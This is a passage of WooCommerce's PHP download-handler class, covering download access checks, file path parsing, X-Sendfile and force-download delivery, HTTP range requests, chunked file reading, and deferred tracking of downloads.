* @param WC_Customer_Download $download Download instance.
*/
private static function check_download_expiry( $download ) {
if ( ! is_null( $download->get_access_expires() ) && $download->get_access_expires()->getTimestamp() < strtotime( 'midnight', time() ) ) {
self::download_error( __( 'Sorry, this download has expired', 'woocommerce' ), '', 403 );
}
}
/**
* Check if a download requires the user to login first.
*
* @param WC_Customer_Download $download Download instance.
*/
private static function check_download_login_required( $download ) {
if ( $download->get_user_id() && 'yes' === get_option( 'woocommerce_downloads_require_login' ) ) {
if ( ! is_user_logged_in() ) {
if ( wc_get_page_id( 'myaccount' ) ) {
wp_safe_redirect( add_query_arg( 'wc_error', rawurlencode( __( 'You must be logged in to download files.', 'woocommerce' ) ), wc_get_page_permalink( 'myaccount' ) ) );
exit;
} else {
self::download_error( __( 'You must be logged in to download files.', 'woocommerce' ) . ' <a href="' . esc_url( wp_login_url( wc_get_page_permalink( 'myaccount' ) ) ) . '" class="wc-forward">' . __( 'Login', 'woocommerce' ) . '</a>', __( 'Log in to Download Files', 'woocommerce' ), 403 );
}
} elseif ( ! current_user_can( 'download_file', $download ) ) {
self::download_error( __( 'This is not your download link.', 'woocommerce' ), '', 403 );
}
}
}
/**
* Count download.
*
* @deprecated 4.4.0
* @param array $download_data Download data.
*/
public static function count_download( $download_data ) {
wc_deprecated_function( 'WC_Download_Handler::count_download', '4.4.0', '' );
}
/**
* Download a file - hook into init function.
*
* @param string $file_path URL to file.
* @param integer $product_id Product ID of the product being downloaded.
*/
public static function download( $file_path, $product_id ) {
if ( ! $file_path ) {
self::download_error( __( 'No file defined', 'woocommerce' ) );
}
$filename = basename( $file_path );
if ( strstr( $filename, '?' ) ) {
$filename = current( explode( '?', $filename ) );
}
$filename = apply_filters( 'woocommerce_file_download_filename', $filename, $product_id );
/**
* Filter download method.
*
* @since 4.5.0
* @param string $method Download method.
* @param int $product_id Product ID.
* @param string $file_path URL to file.
*/
$file_download_method = apply_filters( 'woocommerce_file_download_method', get_option( 'woocommerce_file_download_method', 'force' ), $product_id, $file_path );
// Add action to prevent issues in IE.
add_action( 'nocache_headers', array( __CLASS__, 'ie_nocache_headers_fix' ) );
// Trigger download via one of the methods.
do_action( 'woocommerce_download_file_' . $file_download_method, $file_path, $filename );
}
/**
* Redirect to a file to start the download.
*
* @param string $file_path File path.
* @param string $filename File name.
*/
public static function download_file_redirect( $file_path, $filename = '' ) {
header( 'Location: ' . $file_path );
exit;
}
/**
* Parse file path and see if its remote or local.
*
* @param string $file_path File path.
* @return array
*/
public static function parse_file_path( $file_path ) {
$wp_uploads = wp_upload_dir();
$wp_uploads_dir = $wp_uploads['basedir'];
$wp_uploads_url = $wp_uploads['baseurl'];
/**
* Replace uploads dir, site url etc with absolute counterparts if we can.
* Note the str_replace on site_url is on purpose, so if https is forced
* via filters we can still do the string replacement on a HTTP file.
*/
$replacements = array(
$wp_uploads_url => $wp_uploads_dir,
network_site_url( '/', 'https' ) => ABSPATH,
str_replace( 'https:', 'http:', network_site_url( '/', 'http' ) ) => ABSPATH,
site_url( '/', 'https' ) => ABSPATH,
str_replace( 'https:', 'http:', site_url( '/', 'http' ) ) => ABSPATH,
);
$count = 0;
$file_path = str_replace( array_keys( $replacements ), array_values( $replacements ), $file_path, $count );
$parsed_file_path = wp_parse_url( $file_path );
$remote_file = null === $count || 0 === $count; // Remote file only if there were no replacements.
// Paths that begin with '//' are always remote URLs.
if ( '//' === substr( $file_path, 0, 2 ) ) {
$file_path = ( is_ssl() ? 'https:' : 'http:' ) . $file_path;
/**
* Filter the remote filepath for download.
*
* @since 6.5.0
* @param string $file_path File path.
*/
return array(
'remote_file' => true,
'file_path' => apply_filters( 'woocommerce_download_parse_remote_file_path', $file_path ),
);
}
// See if path needs an abspath prepended to work.
if ( file_exists( ABSPATH . $file_path ) ) {
$remote_file = false;
$file_path = ABSPATH . $file_path;
} elseif ( '/wp-content' === substr( $file_path, 0, 11 ) ) {
$remote_file = false;
$file_path = realpath( WP_CONTENT_DIR . substr( $file_path, 11 ) );
// Check if we have an absolute path.
} elseif ( ( ! isset( $parsed_file_path['scheme'] ) || ! in_array( $parsed_file_path['scheme'], array( 'http', 'https', 'ftp' ), true ) ) && isset( $parsed_file_path['path'] ) ) {
$remote_file = false;
$file_path = $parsed_file_path['path'];
}
/**
* Filter the filepath for download.
*
* @since 6.5.0
* @param string $file_path File path.
* @param bool $remote_file Remote File Indicator.
*/
return array(
'remote_file' => $remote_file,
'file_path' => apply_filters( 'woocommerce_download_parse_file_path', $file_path, $remote_file ),
);
}
/**
* Download a file using X-Sendfile, X-Lighttpd-Sendfile, or X-Accel-Redirect if available.
*
* @param string $file_path File path.
* @param string $filename File name.
*/
public static function download_file_xsendfile( $file_path, $filename ) {
$parsed_file_path = self::parse_file_path( $file_path );
/**
* Fallback on force download method for remote files. This is because:
* 1. xsendfile needs proxy configuration to work for remote files, which cannot be assumed to be available on most hosts.
* 2. Force download method is more secure than redirect method if `allow_url_fopen` is enabled in `php.ini`.
*/
if ( $parsed_file_path['remote_file'] && ! apply_filters( 'woocommerce_use_xsendfile_for_remote', false ) ) {
do_action( 'woocommerce_download_file_force', $file_path, $filename );
return;
}
if ( function_exists( 'apache_get_modules' ) && in_array( 'mod_xsendfile', apache_get_modules(), true ) ) {
self::download_headers( $parsed_file_path['file_path'], $filename );
$filepath = apply_filters( 'woocommerce_download_file_xsendfile_file_path', $parsed_file_path['file_path'], $file_path, $filename, $parsed_file_path );
header( 'X-Sendfile: ' . $filepath );
exit;
} elseif ( stristr( getenv( 'SERVER_SOFTWARE' ), 'lighttpd' ) ) {
self::download_headers( $parsed_file_path['file_path'], $filename );
$filepath = apply_filters( 'woocommerce_download_file_xsendfile_lighttpd_file_path', $parsed_file_path['file_path'], $file_path, $filename, $parsed_file_path );
header( 'X-Lighttpd-Sendfile: ' . $filepath );
exit;
} elseif ( stristr( getenv( 'SERVER_SOFTWARE' ), 'nginx' ) || stristr( getenv( 'SERVER_SOFTWARE' ), 'cherokee' ) ) {
self::download_headers( $parsed_file_path['file_path'], $filename );
$xsendfile_path = trim( preg_replace( '`^' . str_replace( '\\', '/', getcwd() ) . '`', '', $parsed_file_path['file_path'] ), '/' );
$xsendfile_path = apply_filters( 'woocommerce_download_file_xsendfile_x_accel_redirect_file_path', $xsendfile_path, $file_path, $filename, $parsed_file_path );
header( "X-Accel-Redirect: /$xsendfile_path" );
exit;
}
// Fallback.
wc_get_logger()->warning(
sprintf(
/* translators: %1$s contains the filepath of the digital asset. */
__( '%1$s could not be served using the X-Accel-Redirect/X-Sendfile method. A Force Download will be used instead.', 'woocommerce' ),
$file_path
)
);
self::download_file_force( $file_path, $filename );
}
/**
* Parse the HTTP_RANGE request from iOS devices.
* Does not support multi-range requests.
*
* @param int $file_size Size of file in bytes.
* @return array {
* Information about range download request: beginning and length of
* file chunk, whether the range is valid/supported and whether the request is a range request.
*
* @type int $start Byte offset of the beginning of the range. Default 0.
* @type int $length Length of the requested file chunk in bytes. Optional.
* @type bool $is_range_valid Whether the requested range is a valid and supported range.
* @type bool $is_range_request Whether the request is a range request.
* }
*/
protected static function get_download_range( $file_size ) {
$start = 0;
$download_range = array(
'start' => $start,
'is_range_valid' => false,
'is_range_request' => false,
);
if ( ! $file_size ) {
return $download_range;
}
$end = $file_size - 1;
$download_range['length'] = $file_size;
if ( isset( $_SERVER['HTTP_RANGE'] ) ) { // @codingStandardsIgnoreLine.
$http_range = sanitize_text_field( wp_unslash( $_SERVER['HTTP_RANGE'] ) ); // WPCS: input var ok.
$download_range['is_range_request'] = true;
$c_start = $start;
$c_end = $end;
// Extract the range string.
list( , $range ) = explode( '=', $http_range, 2 );
// Make sure the client hasn't sent us a multibyte range.
if ( strpos( $range, ',' ) !== false ) {
return $download_range;
}
/*
* If the range starts with an '-' we start from the beginning.
* If not, we forward the file pointer
* and make sure to get the end byte if specified.
*/
if ( '-' === $range[0] ) {
// The n-number of the last bytes is requested.
$c_start = $file_size - substr( $range, 1 );
} else {
$range = explode( '-', $range );
$c_start = ( isset( $range[0] ) && is_numeric( $range[0] ) ) ? (int) $range[0] : 0;
$c_end = ( isset( $range[1] ) && is_numeric( $range[1] ) ) ? (int) $range[1] : $file_size;
}
/*
* Check the range and make sure it's treated according to the specs: http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html.
* End bytes can not be larger than $end.
*/
$c_end = ( $c_end > $end ) ? $end : $c_end;
// Validate the requested range and return an error if it's not correct.
if ( $c_start > $c_end || $c_start > $file_size - 1 || $c_end >= $file_size ) {
return $download_range;
}
$start = $c_start;
$end = $c_end;
$length = $end - $start + 1;
$download_range['start'] = $start;
$download_range['length'] = $length;
$download_range['is_range_valid'] = true;
}
return $download_range;
}
/**
* Force download - this is the default method.
*
* @param string $file_path File path.
* @param string $filename File name.
*/
public static function download_file_force( $file_path, $filename ) {
$parsed_file_path = self::parse_file_path( $file_path );
$download_range = self::get_download_range( @filesize( $parsed_file_path['file_path'] ) ); // @codingStandardsIgnoreLine.
self::download_headers( $parsed_file_path['file_path'], $filename, $download_range );
$start = isset( $download_range['start'] ) ? $download_range['start'] : 0;
$length = isset( $download_range['length'] ) ? $download_range['length'] : 0;
if ( ! self::readfile_chunked( $parsed_file_path['file_path'], $start, $length ) ) {
if ( $parsed_file_path['remote_file'] && 'yes' === get_option( 'woocommerce_downloads_redirect_fallback_allowed' ) ) {
wc_get_logger()->warning(
sprintf(
/* translators: %1$s contains the filepath of the digital asset. */
__( '%1$s could not be served using the Force Download method. A redirect will be used instead.', 'woocommerce' ),
$file_path
)
);
self::download_file_redirect( $file_path );
} else {
self::download_error( __( 'File not found', 'woocommerce' ) );
}
}
exit;
}
/**
* Get content type of a download.
*
* @param string $file_path File path.
* @return string
*/
private static function get_download_content_type( $file_path ) {
$file_extension = strtolower( substr( strrchr( $file_path, '.' ), 1 ) );
$ctype = 'application/force-download';
foreach ( get_allowed_mime_types() as $mime => $type ) {
$mimes = explode( '|', $mime );
if ( in_array( $file_extension, $mimes, true ) ) {
$ctype = $type;
break;
}
}
return $ctype;
}
/**
* Set headers for the download.
*
* @param string $file_path File path.
* @param string $filename File name.
* @param array $download_range Array containing info about range download request (see {@see get_download_range} for structure).
*/
private static function download_headers( $file_path, $filename, $download_range = array() ) {
self::check_server_config();
self::clean_buffers();
wc_nocache_headers();
header( 'X-Robots-Tag: noindex, nofollow', true );
header( 'Content-Type: ' . self::get_download_content_type( $file_path ) );
header( 'Content-Description: File Transfer' );
header( 'Content-Disposition: ' . self::get_content_disposition() . '; filename="' . $filename . '";' );
header( 'Content-Transfer-Encoding: binary' );
$file_size = @filesize( $file_path ); // phpcs:ignore Generic.PHP.NoSilencedErrors.Discouraged
if ( ! $file_size ) {
return;
}
if ( isset( $download_range['is_range_request'] ) && true === $download_range['is_range_request'] ) {
if ( false === $download_range['is_range_valid'] ) {
header( 'HTTP/1.1 416 Requested Range Not Satisfiable' );
header( 'Content-Range: bytes 0-' . ( $file_size - 1 ) . '/' . $file_size );
exit;
}
$start = $download_range['start'];
$end = $download_range['start'] + $download_range['length'] - 1;
$length = $download_range['length'];
header( 'HTTP/1.1 206 Partial Content' );
header( "Accept-Ranges: 0-$file_size" );
header( "Content-Range: bytes $start-$end/$file_size" );
header( "Content-Length: $length" );
} else {
header( 'Content-Length: ' . $file_size );
}
}
/**
* Check and set certain server config variables to ensure downloads work as intended.
*/
private static function check_server_config() {
wc_set_time_limit( 0 );
if ( function_exists( 'apache_setenv' ) ) {
@apache_setenv( 'no-gzip', 1 ); // phpcs:ignore Generic.PHP.NoSilencedErrors.Discouraged, WordPress.PHP.DiscouragedPHPFunctions.runtime_configuration_apache_setenv
}
@ini_set( 'zlib.output_compression', 'Off' ); // phpcs:ignore Generic.PHP.NoSilencedErrors.Discouraged, WordPress.PHP.DiscouragedPHPFunctions.runtime_configuration_ini_set
@session_write_close(); // phpcs:ignore Generic.PHP.NoSilencedErrors.Discouraged, WordPress.VIP.SessionFunctionsUsage.session_session_write_close
}
/**
* Clean all output buffers.
*
* Can prevent errors, for example: transfer closed with 3 bytes remaining to read.
*/
private static function clean_buffers() {
if ( ob_get_level() ) {
$levels = ob_get_level();
for ( $i = 0; $i < $levels; $i++ ) {
@ob_end_clean(); // phpcs:ignore Generic.PHP.NoSilencedErrors.Discouraged
}
} else {
@ob_end_clean(); // phpcs:ignore Generic.PHP.NoSilencedErrors.Discouraged
}
}
/**
*
* Get selected content disposition
*
* Defaults to attachment if `woocommerce_downloads_deliver_inline` setting is not selected.
*
* @return string Content disposition value.
*/
private static function get_content_disposition() : string {
$disposition = 'attachment';
if ( 'yes' === get_option( 'woocommerce_downloads_deliver_inline' ) ) {
$disposition = 'inline';
}
return $disposition;
}
/**
* Read file chunked.
*
* Reads file in chunks so big downloads are possible without changing PHP.INI - http://codeigniter.com/wiki/Download_helper_for_large_files/.
*
* @param string $file File.
* @param int $start Byte offset/position of the beginning from which to read from the file.
* @param int $length Length of the chunk to be read from the file in bytes, 0 means full file.
* @return bool Success or fail
*/
public static function readfile_chunked( $file, $start = 0, $length = 0 ) {
if ( ! defined( 'WC_CHUNK_SIZE' ) ) {
define( 'WC_CHUNK_SIZE', 1024 * 1024 );
}
$handle = @fopen( $file, 'r' ); // phpcs:ignore Generic.PHP.NoSilencedErrors.Discouraged, WordPress.WP.AlternativeFunctions.file_system_read_fopen
if ( false === $handle ) {
return false;
}
if ( ! $length ) {
$length = @filesize( $file ); // phpcs:ignore Generic.PHP.NoSilencedErrors.Discouraged
}
$read_length = (int) WC_CHUNK_SIZE;
if ( $length ) {
$end = $start + $length - 1;
@fseek( $handle, $start ); // phpcs:ignore Generic.PHP.NoSilencedErrors.Discouraged
$p = @ftell( $handle ); // phpcs:ignore Generic.PHP.NoSilencedErrors.Discouraged
while ( ! @feof( $handle ) && $p <= $end ) { // phpcs:ignore Generic.PHP.NoSilencedErrors.Discouraged
// Don't run past the end of file.
if ( $p + $read_length > $end ) {
$read_length = $end - $p + 1;
}
echo @fread( $handle, $read_length ); // phpcs:ignore Generic.PHP.NoSilencedErrors.Discouraged, WordPress.XSS.EscapeOutput.OutputNotEscaped, WordPress.WP.AlternativeFunctions.file_system_read_fread
$p = @ftell( $handle ); // phpcs:ignore Generic.PHP.NoSilencedErrors.Discouraged
if ( ob_get_length() ) {
ob_flush();
flush();
}
}
} else {
while ( ! @feof( $handle ) ) { // @codingStandardsIgnoreLine.
echo @fread( $handle, $read_length ); // @codingStandardsIgnoreLine.
if ( ob_get_length() ) {
ob_flush();
flush();
}
}
}
return @fclose( $handle ); // phpcs:ignore Generic.PHP.NoSilencedErrors.Discouraged, WordPress.WP.AlternativeFunctions.file_system_read_fclose
}
/**
* Filter headers for IE to fix issues over SSL.
*
* IE bug prevents download via SSL when Cache Control and Pragma no-cache headers set.
*
* @param array $headers HTTP headers.
* @return array
*/
public static function ie_nocache_headers_fix( $headers ) {
if ( is_ssl() && ! empty( $GLOBALS['is_IE'] ) ) {
$headers['Cache-Control'] = 'private';
unset( $headers['Pragma'] );
}
return $headers;
}
/**
* Die with an error message if the download fails.
*
* @param string $message Error message.
* @param string $title Error title.
* @param integer $status Error status.
*/
private static function download_error( $message, $title = '', $status = 404 ) {
/*
* Since we will now render a message instead of serving a download, we should unwind some of the previously set
* headers.
*/
if ( headers_sent() ) {
wc_get_logger()->log( 'warning', __( 'Headers already sent when generating download error message.', 'woocommerce' ) );
} else {
header( 'Content-Type: ' . get_option( 'html_type' ) . '; charset=' . get_option( 'blog_charset' ) );
header_remove( 'Content-Description;' );
header_remove( 'Content-Disposition' );
header_remove( 'Content-Transfer-Encoding' );
}
if ( ! strstr( $message, '<a ' ) ) {
$message .= ' <a href="' . esc_url( wc_get_page_permalink( 'shop' ) ) . '" class="wc-forward">' . esc_html__( 'Go to shop', 'woocommerce' ) . '</a>';
}
wp_die( $message, $title, array( 'response' => $status ) ); // WPCS: XSS ok.
}
/**
* Takes care of tracking download requests, with support for deferring tracking in the case of
* partial (ranged request) downloads.
*
* @param WC_Customer_Download|int $download The download to be tracked.
* @param int|null $user_id The user ID, if known.
* @param string|null $user_ip_address The download IP address, if known.
* @param bool $defer If tracking the download should be deferred.
*
* @return void
* @throws Exception If the active version of Action Scheduler is less than 3.6.0.
*/
private static function track_download( $download, $user_id = null, $user_ip_address = null, bool $defer = false ): void {
try {
// If we were supplied with an integer, convert it to a download object.
$download = new WC_Customer_Download( $download );
// In simple cases, we can track the download immediately.
if ( ! $defer ) {
$download->track_download( $user_id, $user_ip_address );
return;
}
// Counting of partial downloads may be disabled by the site operator.
if ( get_option( 'woocommerce_downloads_count_partial', 'yes' ) !== 'yes' ) {
return;
}
/**
* Determines how long the window of time is for tracking unique download attempts, in relation to
* partial (ranged) download requests.
*
* @since 9.2.0
*
* @param int $window_in_seconds Non-negative number of seconds. Defaults to 1800 (30 minutes).
* @param int $download_permission_id References the download permission being tracked.
*/
$window = absint( apply_filters( 'woocommerce_partial_download_tracking_window', 30 * MINUTE_IN_SECONDS, $download->get_id() ) );
// If we do not have Action Scheduler 3.6.0+ (this would be an unexpected scenario) then we cannot
// track partial downloads, because we require support for unique actions.
if ( version_compare( ActionScheduler_Versions::instance()->latest_version(), '3.6.0', '<' ) ) {
throw new Exception( 'Support for unique scheduled actions is not currently available.' );
}
as_schedule_single_action(
time() + $window,
self::TRACK_DOWNLOAD_CALLBACK,
array(
$download->get_id(),
$user_id,
$user_ip_address,
),
'woocommerce',
true
);
} catch ( Exception $e ) {
wc_get_logger()->error(
'There was a problem while tracking a product download.',
array(
'error' => $e->getMessage(),
'id' => $download->get_id(),
'user_id' => $user_id,
'ip' => $user_ip_address,
'deferred' => $defer ? 'yes' : 'no',
)
);
}
}
}
WC_Download_Handler::init();